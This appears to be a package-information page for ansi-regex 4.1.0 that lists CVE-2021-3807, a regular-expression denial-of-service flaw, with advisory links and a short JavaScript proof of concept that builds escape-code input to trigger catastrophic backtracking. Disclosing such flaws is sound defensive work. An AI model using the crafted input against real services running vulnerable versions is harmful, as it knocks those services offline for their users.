NodeJS/ansi-regex/4.1.0
Regular expression for matching ANSI escape codes
https://www.npmjs.com/package/ansi-regex
MIT
1 Security Vulnerabilities
Inefficient Regular Expression Complexity in chalk/ansi-regex
- https://nvd.nist.gov/vuln/detail/CVE-2021-3807
- https://github.com/advisories/GHSA-93q8-gq69-wqmw
- https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9
- https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994
- https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311
- https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908
- https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774
- https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20221014-0002/
- https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1
- https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a
- https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8
ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
Proof of Concept
js
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The ReDOS is mainly due to the sub-patterns [[\\]()#;?]*
and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*
17 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
3.0.0 | MIT | 1 | 2017-06-20 - 19:03 | almost 7 years |
5.0.0 | MIT | 1 | 2019-10-04 - 11:29 | over 4 years |
6.0.0 | MIT | 1 | 2021-04-16 - 06:02 | about 3 years |
4.0.0 | MIT | 1 | 2018-09-18 - 08:18 | over 5 years |
4.1.0 | MIT | 1 | 2019-03-08 - 06:14 | about 5 years |
1.1.1 | MIT | 2015-02-22 - 09:24 | about 9 years | |
2.0.0 | MIT | 2015-06-30 - 16:07 | almost 9 years | |
2.1.1 | MIT | 2017-01-14 - 03:09 | over 7 years | |
1.0.0 | MIT | 2014-08-13 - 13:29 | over 9 years | |
0.2.0 | MIT | 2014-06-14 - 01:12 | almost 10 years | |
0.1.0 | MIT | 2014-06-03 - 16:59 | almost 10 years | |
0.2.1 | MIT | 2014-06-20 - 16:44 | almost 10 years | |
1.1.0 | MIT | 2014-08-30 - 12:38 | over 9 years | |
6.0.1 | MIT | 2021-09-10 - 20:25 | over 2 years | |
5.0.1 | MIT | 2021-09-14 - 15:55 | over 2 years | |
4.1.1 | MIT | 2022-03-12 - 03:08 | about 2 years | |
3.0.1 | MIT | 2022-03-27 - 13:29 | about 2 years |